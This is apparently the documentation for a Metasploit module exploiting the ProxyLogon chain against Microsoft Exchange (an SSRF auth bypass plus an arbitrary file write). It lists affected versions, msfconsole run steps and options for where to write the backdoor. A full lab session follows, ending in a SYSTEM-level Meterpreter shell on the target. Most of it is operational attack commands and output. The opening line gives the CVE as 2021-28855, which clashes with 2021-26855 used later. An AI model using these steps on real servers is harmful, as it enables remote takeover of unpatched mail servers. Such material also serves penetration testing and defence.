6.8 KiB
Vulnerable Application
CVE-2021-28855 is a pre-authentication SSRF (Server Side Request Forgery) which allows an attacker to bypass authentication by sending specially crafted HTTP requests. This vulnerability is part of an attack chain used to perform an RCE (Remote Code Execution).
CVE-2021-27065 is a post-auth arbitrary-file-write vulnerability to get code execution and the second part of the ProxyLogon attack chain.
This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).
Introduction
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution).
By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
All components are vulnerable by default.
Verification Steps
- Start msfconsole
- Do:
use exploit/windows/http/exchange_proxylogon_rce - Do:
set RHOSTS [IP] - Do:
set EMAIL [EMAIL ADDRESS] - Do:
run
Options
A known email address for this organization.
METHOD
HTTP Method to use for the check (only). Default: POST
UseAlternatePath
Use the IIS root dir as alternate path. Default: false
Advanced Options
BackendServerName
Force the name of the backend Exchange server targeted. Default: Automatic
If not set, the automatic method will use an RPC call to detect the backend server FQDN. This is required because the kerberos-authenticated SSRF can only be sent when the FQDN is known.
ExchangeBasePath
The base path where Exchange is installed. Default: C:\Program Files\Microsoft\Exchange Server\V15
ExchangeWritePath
The path where you want to write the backdoor. Default: owa\auth
You can for example, define to: ecp\auth
IISBasePath
The base path where IIS wwwroot directory is. Default: C:\inetpub\wwwroot
IISWritePath
The path where you want to write the backdoor. Default: aspnet_client
MapiClientApp
This is MAPI client version sent in the request.
MaxWaitLoop
Max counter loop to wait for OAB Virtual Dir reset. Default: 30
Known issues
- With
cmd/windows/adduserpayload, you may need to change the password because the default password does may not meet Microsoft Windows complexity requirements. - Depending on the payload used, two
cmd.exeprocesses remain alive on the server. If this is the case, you cannot make another attempt if they are not killed.
Scenarios
msf6 exploit(windows/http/exchange_proxylogon_rce) > options
Module options (exploit/windows/http/exchange_proxylogon_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
EMAIL TestUserDA@adlab.local yes A known email address for this organization
METHOD POST yes HTTP Method to use for the check (Accepted: GET, POST)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.49.58 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
UseAlternatePath false yes Use the IIS root dir as alternate path
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.49.58 no The target address
Exploit target:
Id Name
-- ----
0 Windows Powershell
msf6 exploit(windows/http/exchange_proxylogon_rce) > exploit
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://192.168.49.58:443 - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://192.168.49.58:443 - Attempt to exploit for CVE-2021-26855
[*] https://192.168.49.58:443 - Retrieving backend FQDN over RPC request
[*] Internal server name (srv02.adlab.local)
[*] https://192.168.49.58:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://192.168.49.58:443 - Sending mapi request
[*] SID: S-1-5-21-1051242124-2374699599-3566640746-1113 (TestUserDA@adlab.local)
[*] https://192.168.49.58:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: 39a0877e-e375-4f8f-b0dd-91dd2a57b2a8
[*] msExchEcpCanary: UFktnukJHk-HpS5vFKa0S7atYvxM9NgI9yo0dsMXgwN8vT1lu_YEmgGvWJdOoBycjlxjgzb95A4.
[*] OAB id: 9b86fdec-7db0-4335-b207-a80596c524af (OAB (Default Web Site))
[*] https://192.168.49.58:443 - Attempt to exploit for CVE-2021-27065
[*] Preparing the payload on the remote target
[*] Writing the payload on the remote target
[!] Waiting for the payload to be available
[+] Yeeting windows/x64/meterpreter/bind_tcp payload at 192.168.49.58:443
[*] Started bind TCP handler against 192.168.49.58:4444
[*] Sending stage (200262 bytes) to 192.168.49.58
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\TgnqKA.aspx
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 192.168.49.58:4444) at 2021-03-29 09:59:17 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : SRV02
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : ADLAB
Logged On Users : 7
Meterpreter : x64/windows
meterpreter >